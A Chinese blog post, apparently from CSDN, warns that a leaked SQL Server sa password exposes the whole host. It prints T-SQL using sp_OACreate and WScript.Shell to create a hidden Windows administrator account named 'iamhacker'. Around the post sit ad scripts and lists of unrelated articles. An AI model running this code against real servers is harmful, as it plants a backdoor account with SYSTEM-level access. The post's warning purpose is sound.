SQLServer的隐患:不要以为黑掉的只是SQLSERVER而已。

最新推荐文章于 2022-07-31 02:31:40 发布
最新推荐文章于 2022-07-31 02:31:40 发布
阅读量311 收藏
点赞数
文章标签: sqlserver object system null exe server
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zgqtxwd/article/details/2338417
版权
<script type="text/javascript"> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
<script type="text/javascript"> </script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
SQLSERVER存在着非常严重的安全 隐患。sa的密码就像Administrator的密码一样重要。

假如别人获得了超级用户sa的密码,那么他/她可以在查询分析器里使用下面的SQL语句轻易在( SQLSERVER所在的Server)上创建一个超级用户:

declare@objectint
--创建WScript.Shell
EXECsp_OACreate@#WScript.Shell@#,@objectOUT
--运行netuseriamhackeropendoor/add
--添加一个名字为iamhacker,密码为opendoor的用户
EXECsp_OAMethod@object,@#Run@#,NULL,@#netuseriamhackeropendoor/add@#
--把iamhacker添加到Administrators组中
EXECsp_OAMethod@object,@#Run@#,NULL,@#netlocalgroupAdministratorsiamhacker/add@#
--把iamhacker从User组中删除
EXECsp_OAMethod@object,@#Run@#,NULL,@#netlocalgroupUsersiamhacker/del@#

我已经尝试过了。。实在太恐怖了。

上面的语句很短。核心是能够调用平台命令net。

其实现方法是 SQLSERVER调用COMAutomation的强大功能。再配合WSH中的一个对象WScript.Shell的一个方法:Run。(注意,一般 SQLSERVER都是配置在SYSTEM的权限下运行的。也就是说,Run所调用的程序也是具有SYSTEM的权限。)

(相关的实验是,调用一下NOTEPAD,那么任务管理器下将有用户为SYSTEM的NOTEPAD。EXE进程存在)

WScript.Shell的 隐患其实已经在各个方面很显著了。想不到现在竟然在 SQLSERVER上也有相关的问题。

所以。大家一定要注意保管好sa的密码。 不要随便被人黑了哦。。。

<script type="text/javascript"> </script> <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
<script type="text/javascript"> </script><script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
zgqtxwd
关注
CSDN 数据技巧
hxhappy's eyes
04-09 6496
  取 Access640-605 Remote Access 2.0 考试大纲Access Violations(访问冲突)ACCESS97关于数据库安全的几个问题AccesS密码的打击Access数据库操作中出现的怪现象Access数据库导入Mysql的方法之一ACCESS数据库防止下载大盘点ACCESS数据库向MySQL快速迁移小程序(二)ACCESS数据库向MySQL快速迁移小程序(一)A
java面试题及答案2022,java2022最新面试题及答案
javalingyu的博客
04-13 953
发现网上很多Java面试题都没有答案,所以花了很长时间搜集整理出来了这套Java面试题大全,希望对大家有帮助哈~ 本套Java面试题大全,全的不能再全,哈哈~ 一、Java 基础 1. JDK 和 JRE 有什么区别? JDK:Java Development Kit 的简称,java 开发工具包,提供了 java 的开发环境和运行环境。 JRE:Java Runtime Environment 的简称,java 运行环境,为 java 的运行提供了所需环境。 具体来说 JDK 其实包含了 JRE
SQL Server数据库安全策略指南
03-10
数据库安全威胁和数据偷窃的发生率在不断增加,而行业专家认为如果想要在2010年及以后继续保护敏感信息,大多数组织需要重新考虑他们的数据库安全性策略。在本次的技术手册中,我们将讨论SQL Server数据库安全的话题,其中包括数据加密、SQL注入攻击、角色控制以及安全通信方面的内容,希望对SQL Server安全有个更全面了解的读者,赶紧下载阅读吧。 来自TT
隐患不要以为黑掉的只是SQLSERVER而已。
zgqtxwd的专栏
04-27 270
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
讲解SQL Server数据库的触发器安全隐患
zgqtxwd的专栏
04-30 356
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
SQL服务器面临的危险和补救.读[十种方法]后感.
zzcv_的专栏
03-05 1571
 SQL服务器面临的危险.危险:没有防火墙保护,暴露在公网中.后果:SQL蠕虫感染和黑客进行拒绝服务攻击、缓存溢出、SQL盲注和其它攻击. 补救:安装一款防火墙,即使经费有限,网上也有大把的免费产品.危险:没有进行安全漏洞扫描.后果:操作系统和各网络程序本身的漏洞被黑客发现,连累数据库被攻破.补救:永远保持最新的安全补丁,定期使用安全漏洞评估工具进行扫描. 危险:列举SQL服务器解析服
sqlserver日志处理不当而造成的隐患
12-05 467
sqlserver日志处理不当而造成的隐患 事故背景:一大早还在路上,群里陆续有人反馈系统一直报错 “Unknown error 258”,后来查询日志发现错误日志 第一反应是不是数据库连接不够用了?导致超时?但是通过sql查询当时连接也只有40个左右,于是继续排查问题,发现dbserver机器这段时间磁盘io操作特别的高,很不正常,详见下图 发现磁盘io问题,继续查看sqlserver日志,发现原因:“Autogrow of file 'xxxx_...
2022年Java 工程师面试题
weixin_42572320的博客
03-03 2515
第 1 页 共 485 页 目录 1、什么是 Mybatis?............................................................................... 33 2、Mybaits 的优点:............................................................................... 33 3、MyBatis 框架的缺点:.............................
深度解析国内公有云大厂基础实力
热门推荐
biubiudog的博客
03-23 1万+
深度解析国内公有云大厂基础实力导读最近网上有很多各种各样的“国内公有云技术分析”,“云计算实力榜”,“公有云技术评析”等等五花八门的文章,可谓是乱花渐欲迷人眼。看了这么多文章,很难发现一篇真正的从开发者,用户角度来客观评价国内公有云厂商基础服务实力的有深度的文章,小编本着对开发者同学们负责的角度来深度分析一下目前国内几大主流公有云厂商的技术实力,为各位同学在选购公有云产品的时候提供一些帮助。
【2021最新版】RabbitMQ面试题总结(32道题含答案解析)
m0_67400973的博客
07-31 1057
采用AMQP高级消息队列协议的一种消息队列技术,最大的特点就是消费并不需要确保提供方存在,实现了服务之间的高度解耦。MQ就是消息队列。是软件和软件进行通信的中间件产品。RabbitMQ面试题总结先自我介绍一下,小编13年上师交大毕业,曾经在小公司待过,去过华为OPPO等大厂,18年进入阿里,直到现在。深知大多数初中级java工程师,想要升技能,往往是需要自己摸索成长或是报班学习,但对于培训机构动则近万元的学费,着实压力不小。自己不成体系的自学效率很低又漫长,而且容易碰到天花板技术停止不前。https。...
SQLServer数据库 DBA面试题 最新试卷 SQL面试题
06-24
SQLServer数据库 DBA面试题 最新试卷 SQL面试题 京华志&精华志出品 希望大家互相学习,互相进步 支持CSDN 支持微软
程序员面试 ,SQL的面试题目,常见问题及答案
10-08
Sql常见面试题(总结)精妙的SQL语句!高级sql面试题 一个看似简单的题 关于论坛上那个SQL微软面试题
数据库DBA笔试题
10-30
数据库DBA面试题,让你提前掌握企业需要的哪些人才,企业最关心你会的哪些技术!
SQL_Server_DBA_名企面试问题及答案
12-20
某名企数据库面试问题答案(答案仅供参考!)
SQL面试题(很全,带答案)
01-29
SQL面试题(很全,带答案),而且整理过的。
.net core + redis + rabbitMQ+SqlServer秒杀系统
张峰的博客
11-13 1912
代码参考:https://github.com/xiaomifengmaidi/Redis https://www.cnblogs.com/wangrudong003/p/7111789.html
基于 SpringBoot+Mybatis+Redis+RabbitMQ 秒杀系统
weixin_45569376的博客
11-18 674
基于 SpringBoot+Mybatis+Redis+RabbitMQ 秒杀系统 版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接:https://blog.csdn.net/qq_33524158/article/details/81675011 开发工具 idea 2017.2.3 开发环境 JDK Maven Mysql S...
MyEclipse连接SQL Server 2005:详细步骤
- 在`SQL Server Configuration Manager`中,可以管理SQL Server的相关服务,如启动或停止`SQL Server (SQLEXPRESS)`和`SQL Server (MSSQLSERVER)`服务。 - 需要确保`TCP/IP`协议被启用,并设置`IPAll`下的`TCP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值